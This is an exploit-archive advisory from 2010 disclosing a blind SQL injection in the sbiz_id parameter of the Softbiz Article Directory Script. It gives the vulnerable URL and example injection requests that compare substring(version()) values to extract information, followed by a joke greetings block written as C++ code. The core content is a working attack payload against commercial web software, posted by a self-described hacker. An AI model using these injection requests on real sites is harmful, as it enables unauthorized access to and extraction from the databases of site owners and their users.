[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]
# Title : Softbiz Article Directory Script (sbiz_id) Blind SQL Injection Vulnerability
# Published : 2010-09-05
# Author : BorN To K!LL
# Previous Title : Gantry Framework 3.0.10 (Joomla) Blind SQL Injection Exploit
# Next Title : MOAUB #8 - Sirang Web-Based D-Control Multiple Remote Vulnerabilities
===========================================================
[~] Title: Article Directory (sbiz_id) Blind SQL Injection Vuln
[~] Script: Article Directory
[~] Price: $65
[~] Link: http://www.softbizscripts.com/article-management-script.php
===========================================================
[~] Author: BorN To K!LL - h4ck3r
[~] Contact: SQL@hotmail.co.uk
===========================================================
[~] 3xploit:
/article_details.php?sbiz_id=[Blind-Injection]
[~] Example:
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=4 // False ,,
server/article_details.php?sbiz_id=13 and substring(version(),1,1)=5 // True ,,
===========================================================
[~] Greetings:
bool Greetings = True;
if (Greetings = True)
{
cout<<"Dr.2"
<<"Q8 H4x0r"
<<"Dr.Faustus"
<<"AsbMay's Group"
<<"darkc0de team"
<<"my wife.."
<<"and all friends n";
}
else
{
cout<<"No greeting ..n";
}
===========================================================